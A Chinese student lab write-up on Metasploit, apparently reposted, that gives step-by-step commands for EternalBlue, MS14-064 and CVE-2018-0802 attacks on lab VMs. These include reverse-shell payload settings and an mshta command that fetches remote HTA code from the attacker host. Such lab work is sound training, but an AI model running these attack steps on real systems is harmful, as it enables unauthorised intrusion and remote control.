Exp5 MSF基础应用
Posted 8cloud33zzk
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Exp5 MSF基础应用相关的知识,希望对你有一定的参考价值。
Exp5 MSF基础应用
5.1 实验内容
本次实验主要是掌握metasploit的基本应用,主要是按三种思路来进行实验,比较接近正常情况下的漏洞利用。同时在漏洞利用过程中出现了我们听过的漏洞和常用软件的漏洞利用。
主要实验内容:
- 利用操作系统漏洞进行主动攻击,本次实验是windows的
ms17-010漏洞
进行利用 - 针对浏览器的漏洞进行利用,本次实验是利用
MS14-064漏洞
入侵win7系统 - 针对客户端漏洞的攻击,本次实验是利用office的
CVE-2018-0802漏洞
进行的攻击 - 成功应用任何一个辅助模块
5.2实验步骤
5.2.1 一个主动攻击实践--利用ms17-010漏洞对Windows主机的攻击
基本配置
- 攻击机 kail linux
- 靶机 windows server 2008 R2
具体操作
- 首先输入指令
msfconsole
进入到控制台 - 配置exploit选项,这里利用的ms17-010漏洞(也就是永恒之蓝利用的漏洞)输入命令
msf > use exploit/windows/smb/ms17_010_eternalblue
,然后就是设置靶机ip的命令set rhost 192.168.92.130
。 然后继续对payload进行配置,配置攻击机监听返回会话,输入命令
set payload windows/x64/meterpreter/reverse_tcp
设置payload,然后设置set lhost 192.168.92.128
设定攻击机的监听,最后exploit
进行攻击。
可以看到,成功获得靶机系统操作。
5.2.2 一个针对浏览器的攻击--利用MS14-064漏洞对win7的攻击
基本配置
- 攻击机 kali linux
- 靶机 Windows7 x64
具体操作
- 攻击方式相近,首先进入msfconsole控制台中
- 输入
use exploit/windows/browser/ms14_064_ole_code_execution设置MS14-064
漏洞利用模块 set payload windows/meterpreter/reverse_tcp
设置payloadset SRVHOST 192.168.92.128
设置攻击机监听set AllowPowerShellPrompt true
这个是因为需要用到windows中自带的powershellset lport 5103
设置端口set lhost 192.168.92.128
设置攻击机ip
exploit
开始,生成网址链接http://192.168.92.128:8080/R8TaLT
复制链接,靶机在浏览器中输入链接后,攻击机攻击成功。
5.2.3 一个针对客户端的攻击--利用office存在中的CVE-2018-0802漏洞进行攻击
基本配置
- 攻击机 kali linux
- 靶机 windows10 office2013
具体操作
- 还是打开msfconsole,使用攻击模块
use exploit/windows/misc/hta_server
set LHOST 192.168.92.128
设置攻击机set LPORT 5103
set SRVHOST 192.168.92.128
set target 1
设置目标(由于是x64所以是1)
使用exploit生成hta链接
从网上下载关于此漏洞poc文件,使用
python RTF_11882_0802.py -c "mshta http://192.168.92.128:8080/sBeLshqkj59n.hta" -o Password5103.doc
生成doc文件
将doc文件拷到我的win10中,打开文件
这边kali成功获得了我这的操作权限。
5.2.4 辅助模块
-进入控制台直接可以输入search portscan
来看看我们可以用哪些辅助模块来进行端口扫描
这里用的还是
auxiliary/scanner/portscan/tcp
模块
然后设置一下目标ip就可以开始端口扫描了
这里实际上我扫过我的win7发现半天没反应,后来发现跟防火墙有关系。
5.3 基础问题回答
什么是exploit,payload,encode
exploit
是攻击的一套运行模块,负责基于核心模块给出传输及功能实现。payload
是攻击的核心,在攻击中主要起做用的部分,针对不同的漏洞利用不同的paylaod进行攻击。攻击时放入到靶机中执行。encode
也是msf的一个模块,这这个模块主要负责编码,将payload处理成目标机可执行,去掉坏字符,不会被检测到(免杀)的代码。
实践总结与体会
本次实验确实感触很深,由于做实验时间较晚,因此在做实验的时候在网上找了不少关于漏洞的资料,也让自己开了开眼,发现好多以前听说过的知名网安事件所利用的漏洞在自己的操作下也可以成功实施攻击。不过不少漏洞在安全人员的辛苦工作下还是把漏洞限制在了特定的软件或操作系统版本中才能被利用。在进行客户端攻击中,发现自己常用的软件客户端的漏洞被利用也非常的令人后背发凉,不过好在是也会被杀软查出来,但是针对0day漏洞还是很难被发现,因此,我们还是得好好钻研知识,提高安全意识,当然挖掘漏洞也是我们应该认真去尝试的!
离实战还缺些什么技术或步骤?
在我看来,目前在实战方面还需要考虑的就是我们如何去找到别人的用户端,然后从外网想办法去绕过防火墙来进行攻击。但是事实上对于不同的安全系统所采用的安全等级肯定不一样(我这里的意思是因人而异)如果你要进入到跟你同一网段而且平时没什么安全意识的人的电脑中感觉还是蛮容易的。。。。(但是这样是会违法的!)
以上是关于Exp5 MSF基础应用的主要内容,如果未能解决你的问题,请参考以下文章